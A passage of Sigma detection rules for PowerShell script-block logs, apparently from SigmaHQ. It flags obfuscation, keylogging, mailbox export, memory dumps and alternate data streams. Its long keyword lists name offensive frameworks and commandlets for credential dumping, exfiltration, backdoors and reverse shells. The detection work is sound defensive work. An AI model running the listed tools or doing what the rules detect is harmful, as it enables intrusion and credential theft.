    "content": "title: Invoke-Obfuscation Via Stdin - Powershell\nid: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - Powershell\nid: db92dd33-a3ad-49cf-8c2c-608c3e30ace0\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: '(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - PowerShell\nid: e55a5195-4724-480e-a77e-3ebe64bd3759\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-08\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - PowerShell\nid: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b\nstatus: test\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nikita Nazarov, oscd.community\ndate: 2019-10-08\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ScriptBlockText|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell\nid: e54f5149-6ba3-49cf-b153-070d24679126\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c' # FPs with |\\/r\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_keylogging.yml",
    "content": "title: Powershell Keylogging\nid: 34f90d3c-c297-49e9-b26d-911b05a4866c\nstatus: test\ndescription: Adversaries may log user keystrokes to intercept credentials as the user types them.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1\nauthor: frack113\ndate: 2021-07-30\nmodified: 2022-07-11\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_basic:\n        ScriptBlockText|contains: 'Get-Keystrokes'\n    selection_high: # want to run in background and keyboard\n        ScriptBlockText|contains|all:\n            - 'Get-ProcAddress user32.dll GetAsyncKeyState'\n            - 'Get-ProcAddress user32.dll GetForegroundWindow'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_localuser.yml",
    "content": "title: Powershell LocalAccount Manipulation\nid: 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c\nstatus: test\ndescription: |\n    Adversaries may manipulate accounts to maintain access to victim systems.\n    Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1\nauthor: frack113\ndate: 2021-12-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Disable-LocalUser'\n            - 'Enable-LocalUser'\n            - 'Get-LocalUser'\n            - 'Set-LocalUser'\n            - 'New-LocalUser'\n            - 'Rename-LocalUser'\n            - 'Remove-LocalUser'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml",
    "content": "title: Suspicious PowerShell Mailbox Export to Share - PS\nid: 4a241dea-235b-4a7e-8d76-50d817b146c4\nrelated:\n    - id: 889719ef-dd62-43df-86c3-768fb08dc7c0\n      type: derived\nstatus: test\ndescription: Detects usage of the PowerShell New-MailboxExportRequest Cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2481\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\ntags:\n    - attack.exfiltration\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-MailboxExportRequest'\n            - ' -Mailbox '\n            - ' -FilePath \\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml",
    "content": "title: Malicious PowerShell Commandlets - ScriptBlock\nid: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\nrelated:\n    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c\n      type: similar\n    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc\n      type: similar\n    - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf\n      type: obsolete\n    - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e\n      type: obsolete\nstatus: test\ndescription: Detects Commandlet names from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer\ndate: 2017-03-05\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            # Note: Please ensure alphabetical order when adding new entries\n            - 'Add-Exfiltration'\n            - 'Add-Persistence'\n            - 'Add-RegBackdoor'\n            - 'Add-RemoteRegBackdoor'\n            - 'Add-ScrnSaveBackdoor'\n            - 'ConvertTo-Rc4ByteStream'\n            - 'Decrypt-Hash'\n            - 'Disable-ADIDNSNode'\n            - 'Do-Exfiltration'\n            - 'Enable-ADIDNSNode'\n            - 'Enabled-DuplicateToken'\n            - 'Exploit-Jboss'\n            - 'Export-ADRCSV'\n            - 'Export-ADRExcel'\n            - 'Export-ADRHTML'\n            - 'Export-ADRJSON'\n            - 'Export-ADRXML'\n            - 'Find-Fruit'\n            - 'Find-GPOLocation'\n            - 'Find-TrustedDocuments'\n            - 'Get-ADIDNSNodeAttribute'\n            - 'Get-ADIDNSNodeOwner'\n            - 'Get-ADIDNSNodeTombstoned'\n            - 'Get-ADIDNSPermission'\n            - 'Get-ADIDNSZone'\n            - 'Get-ChromeDump'\n            - 'Get-ClipboardContents'\n            - 'Get-FoxDump'\n            - 'Get-GPPPassword'\n            - 'Get-IndexedItem'\n            - 'Get-KerberosAESKey'\n            - 'Get-Keystrokes'\n            - 'Get-LSASecret'\n            - 'Get-PassHashes'\n            - 'Get-RegAlwaysInstallElevated'\n            - 'Get-RegAutoLogon'\n            - 'Get-RemoteBootKey'\n            - 'Get-RemoteCachedCredential'\n            - 'Get-RemoteLocalAccountHash'\n            - 'Get-RemoteLSAKey'\n            - 'Get-RemoteMachineAccountHash'\n            - 'Get-RemoteNLKMKey'\n            - 'Get-RickAstley'\n            - 'Get-SecurityPackages'\n            - 'Get-ServiceFilePermission'\n            - 'Get-ServicePermission'\n            - 'Get-ServiceUnquoted'\n            - 'Get-SiteListPassword'\n            - 'Get-System'\n            - 'Get-TimedScreenshot'\n            - 'Get-UnattendedInstallFile'\n            - 'Get-Unconstrained'\n            - 'Get-USBKeystrokes'\n            - 'Get-VaultCredential'\n            - 'Get-VulnAutoRun'\n            - 'Get-VulnSchTask'\n            - 'Grant-ADIDNSPermission'\n            - 'Gupt-Backdoor'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-ADRecon'\n            - 'Invoke-ADSBackdoor'\n            - 'Invoke-AgentSmith'\n            - 'Invoke-AllChecks'\n            - 'Invoke-ARPScan'\n            - 'Invoke-AzureHound'\n            - 'Invoke-BackdoorLNK'\n            - 'Invoke-BadPotato'\n            - 'Invoke-BetterSafetyKatz'\n            - 'Invoke-BypassUAC'\n            - 'Invoke-Carbuncle'\n            - 'Invoke-Certify'\n            - 'Invoke-ConPtyShell'\n            - 'Invoke-CredentialInjection'\n            - 'Invoke-DAFT'\n            - 'Invoke-DCSync'\n            - 'Invoke-DinvokeKatz'\n            - 'Invoke-DllInjection'\n            - 'Invoke-DNSUpdate'\n            - 'Invoke-DNSExfiltrator'\n            - 'Invoke-DomainPasswordSpray'\n            - 'Invoke-DowngradeAccount'\n            - 'Invoke-EgressCheck'\n            - 'Invoke-Eyewitness'\n            - 'Invoke-FakeLogonScreen'\n            - 'Invoke-Farmer'\n            - 'Invoke-Get-RBCD-Threaded'\n            - 'Invoke-Gopher'\n            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX\n            - 'Invoke-HandleKatz'\n            - 'Invoke-ImpersonatedProcess'\n            - 'Invoke-ImpersonateSystem'\n            - 'Invoke-InteractiveSystemPowerShell'\n            - 'Invoke-Internalmonologue'\n            - 'Invoke-Inveigh'\n            - 'Invoke-InveighRelay'\n            - 'Invoke-KrbRelay'\n            - 'Invoke-LdapSignCheck'\n            - 'Invoke-Lockless'\n            - 'Invoke-MalSCCM'\n            - 'Invoke-Mimikatz'\n            - 'Invoke-Mimikittenz'\n            - 'Invoke-MITM6'\n            - 'Invoke-NanoDump'\n            - 'Invoke-NetRipper'\n            - 'Invoke-Nightmare'\n            - 'Invoke-NinjaCopy'\n            - 'Invoke-OfficeScrape'\n            - 'Invoke-OxidResolver'\n            - 'Invoke-P0wnedshell'\n            - 'Invoke-Paranoia'\n            - 'Invoke-PortScan'\n            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps\n            - 'Invoke-PostExfil'\n            - 'Invoke-PowerDump'\n            - 'Invoke-PowerDPAPI'\n            - 'Invoke-PowerShellTCP'\n            - 'Invoke-PowerShellWMI'\n            - 'Invoke-PPLDump'\n            - 'Invoke-PsExec'\n            - 'Invoke-PSInject'\n            - 'Invoke-PsUaCme'\n            - 'Invoke-ReflectivePEInjection'\n            - 'Invoke-ReverseDNSLookup'\n            - 'Invoke-Rubeus'\n            - 'Invoke-RunAs'\n            - 'Invoke-SafetyKatz'\n            - 'Invoke-SauronEye'\n            - 'Invoke-SCShell'\n            - 'Invoke-Seatbelt'\n            - 'Invoke-ServiceAbuse'\n            - 'Invoke-ShadowSpray'\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - 'Invoke-Shellcode'\n            - 'Invoke-SMBScanner'\n            - 'Invoke-Snaffler'\n            - 'Invoke-Spoolsample'\n            - 'Invoke-SpraySinglePassword'\n            - 'Invoke-SSHCommand'\n            - 'Invoke-StandIn'\n            - 'Invoke-StickyNotesExtract'\n            - 'Invoke-SystemCommand'\n            - 'Invoke-Tasksbackdoor'\n            - 'Invoke-Tater'\n            - 'Invoke-Thunderfox'\n            - 'Invoke-ThunderStruck'\n            - 'Invoke-TokenManipulation'\n            - 'Invoke-Tokenvator'\n            - 'Invoke-TotalExec'\n            - 'Invoke-UrbanBishop'\n            - 'Invoke-UserHunter'\n            - 'Invoke-VoiceTroll'\n            - 'Invoke-Whisker'\n            - 'Invoke-WinEnum'\n            - 'Invoke-winPEAS'\n            - 'Invoke-WireTap'\n            - 'Invoke-WmiCommand'\n            - 'Invoke-WMIExec'\n            - 'Invoke-WScriptBypassUAC'\n            - 'Invoke-Zerologon'\n            - 'MailRaider'\n            - 'New-ADIDNSNode'\n            - 'New-HoneyHash'\n            - 'New-InMemoryModule'\n            - 'New-SOASerialNumberArray'\n            - 'Out-Minidump'\n            - 'PowerBreach'\n            - 'powercat '\n            - 'PowerUp'\n            - 'PowerView'\n            - 'Remove-ADIDNSNode'\n            - 'Remove-Update'\n            - 'Rename-ADIDNSNode'\n            - 'Revoke-ADIDNSPermission'\n            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner\n            - 'Show-TargetScreen'\n            - 'Start-CaptureServer'\n            - 'Start-Dnscat2'\n            - 'Start-WebcamRecorder'\n            - 'VolumeShadowCopyTools'\n            # - 'Check-VM'\n            # - 'Disable-MachineAccount'\n            # - 'Enable-MachineAccount'\n            # - 'Get-ApplicationHost'\n            # - 'Get-MachineAccountAttribute'\n            # - 'Get-MachineAccountCreator'\n            # - 'Get-Screenshot'\n            # - 'HTTP-Login'\n            # - 'Install-ServiceBinary'\n            # - 'Install-SSP'\n            # - 'New-DNSRecordArray'\n            # - 'New-MachineAccount'\n            # - 'Port-Scan'\n            # - 'Remove-MachineAccount'\n            # - 'Set-MacAttribute'\n            # - 'Set-MachineAccountAttribute'\n            # - 'Set-Wallpaper'\n    filter_optional_amazon_ec2:\n        ScriptBlockText|contains:\n            - Get-SystemDriveInfo  # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1\n            - C:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\  # false positive form Amazon EC2\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml",
    "content": "title: Malicious PowerShell Keywords\nid: f62176f3-8128-4faa-bf6c-83261322e5eb\nstatus: test\ndescription: Detects keywords from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\nauthor: Sean Metcalf (source), Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-06-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'AdjustTokenPrivileges'\n            - 'IMAGE_NT_OPTIONAL_HDR64_MAGIC'\n            # - 'LSA_UNICODE_STRING'\n            - 'Metasploit'\n            - 'Microsoft.Win32.UnsafeNativeMethods'\n            - 'Mimikatz'\n            - 'MiniDumpWriteDump'\n            - 'PAGE_EXECUTE_READ'\n            - 'ReadProcessMemory.Invoke'\n            - 'SE_PRIVILEGE_ENABLED'\n            - 'SECURITY_DELEGATION'\n            - 'TOKEN_ADJUST_PRIVILEGES'\n            - 'TOKEN_ALL_ACCESS'\n            - 'TOKEN_ASSIGN_PRIMARY'\n            - 'TOKEN_DUPLICATE'\n            - 'TOKEN_ELEVATION'\n            - 'TOKEN_IMPERSONATE'\n            - 'TOKEN_INFORMATION_CLASS'\n            - 'TOKEN_PRIVILEGES'\n            - 'TOKEN_QUERY'\n    condition: selection\nfalsepositives:\n    - Depending on the scripts, this rule might require some initial tuning to fit the environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml",
    "content": "title: Live Memory Dump Using Powershell\nid: cd185561-4760-45d6-a63e-a51325112cae\nstatus: test\ndescription: Detects usage of a PowerShell command to dump the live memory of a Windows machine\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-09-21\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-StorageDiagnosticInfo'\n            - '-IncludeLiveDump'\n    condition: selection\nfalsepositives:\n    - Diagnostics\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml",
    "content": "title: Modify Group Policy Settings - ScriptBlockLogging\nid: b7216a7d-687e-4c8d-82b1-3080b2ad961f\nrelated:\n    - id: ada4b0c4-758b-46ac-9033-9004613a150d\n      type: similar\nstatus: test\ndescription: Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md\nauthor: frack113\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_path:\n        ScriptBlockText|contains: \\SOFTWARE\\Policies\\Microsoft\\Windows\\System\n    selection_key:\n        ScriptBlockText|contains:\n            - GroupPolicyRefreshTimeDC\n            - GroupPolicyRefreshTimeOffsetDC\n            - GroupPolicyRefreshTime\n            - GroupPolicyRefreshTimeOffset\n            - EnableSmartScreen\n            - ShellSmartScreenLevel\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml",
    "content": "title: Powershell MsXml COM Object\nid: 78aa1347-1517-4454-9982-b338d6df8343\nstatus: test\ndescription: |\n    Adversaries may abuse PowerShell commands and scripts for execution.\n    PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\n    Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt\n    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)\n    - https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\nauthor: frack113, MatilJ\ndate: 2022-01-19\nmodified: 2022-05-19\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - '-ComObject'\n            - 'MsXml2.'\n            - 'XmlHttp'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml",
    "content": "title: Malicious Nishang PowerShell Commandlets\nid: f772cee9-b7c2-4cb2-8f07-49870adc02e0\nstatus: test\ndescription: Detects Commandlet names and arguments from the Nishang exploitation framework\nreferences:\n    - https://github.com/samratashok/nishang\nauthor: Alec Costello\ndate: 2019-05-16\nmodified: 2023-01-16\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Add-ConstrainedDelegationBackdoor'\n            # - 'Add-Persistence' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            # - 'Add-RegBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            # - 'Add-ScrnSaveBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Copy-VSS'\n            - 'Create-MultipleSessions'\n            - 'DataToEncode'\n            - 'DNS_TXT_Pwnage'\n            - 'Do-Exfiltration-Dns'\n            - 'Download_Execute'\n            - 'Download-Execute-PS'\n            - 'DownloadAndExtractFromRemoteRegistry'\n            - 'DumpCerts'\n            - 'DumpCreds'\n            - 'DumpHashes'\n            - 'Enable-DuplicateToken'\n            - 'Enable-Duplication'\n            - 'Execute-Command-MSSQL'\n            - 'Execute-DNSTXT-Code'\n            - 'Execute-OnTime'\n            - 'ExetoText'\n            - 'exfill'\n            - 'ExfilOption'\n            - 'FakeDC'\n            - 'FireBuster'\n            - 'FireListener'\n            - 'Get-Information ' # Space at the end is required. 
Otherwise, we get FP with Get-InformationBarrierReportDetails or Get-InformationBarrierReportSummary\n            # - 'Get-PassHashes' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Get-PassHints'\n            - 'Get-Web-Credentials'\n            - 'Get-WebCredentials'\n            - 'Get-WLAN-Keys'\n            # - 'Gupt-Backdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'HTTP-Backdoor'\n            # - 'Invoke-ADSBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-AmsiBypass'\n            - 'Invoke-BruteForce'\n            - 'Invoke-CredentialsPhish'\n            - 'Invoke-Decode'\n            - 'Invoke-Encode'\n            - 'Invoke-Interceptor'\n            - 'Invoke-JSRatRegsvr'\n            - 'Invoke-JSRatRundll'\n            - 'Invoke-MimikatzWDigestDowngrade'\n            - 'Invoke-NetworkRelay'\n            # - 'Invoke-PortScan' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            # - 'Invoke-PoshRatHttp' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-PowerShellIcmp'\n            - 'Invoke-PowerShellUdp'\n            - 'Invoke-Prasadhak'\n            - 'Invoke-PSGcat'\n            - 'Invoke-PsGcatAgent'\n            # - 'Invoke-PsUACme' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-SessionGopher'\n            - 'Invoke-SSIDExfil'\n            # - Jitter  # Prone to FPs\n            # - 'Keylogger' # Too generic to be linked to Nishang\n            - 'LoggedKeys'\n            - 'Nishang'\n            - 'NotAllNameSpaces' # This is param to \"Set-RemoteWMI\"\n            - 'Out-CHM'\n            - 'OUT-DNSTXT'\n            - 'Out-HTA'\n            - 'Out-RundllCommand'\n            - 'Out-SCF'\n            - 'Out-SCT'\n            - 'Out-Shortcut'\n            - 'Out-WebQuery'\n            - 'Out-Word'\n            - 'Parse_Keys'\n            - 'Password-List'\n            - 'Powerpreter'\n            - 
'Remove-Persistence'\n            - 'Remove-PoshRat'\n            - 'Remove-Update'\n            - 'Run-EXEonRemote'\n            - 'Set-DCShadowPermissions'\n            - 'Set-RemotePSRemoting'\n            - 'Set-RemoteWMI'\n            - 'Shellcode32'\n            - 'Shellcode64'\n            - 'StringtoBase64'\n            - 'TexttoExe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml",
    "content": "title: NTFS Alternate Data Stream\nid: 8c521530-5169-495d-a199-0a3a881ad24e\nstatus: test\ndescription: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.\nreferences:\n    - https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nauthor: Sami Ruohonen\ndate: 2018-07-24\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_content:\n        ScriptBlockText|contains:\n            - set-content\n            - add-content\n    selection_stream:\n        ScriptBlockText|contains: '-stream'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml",
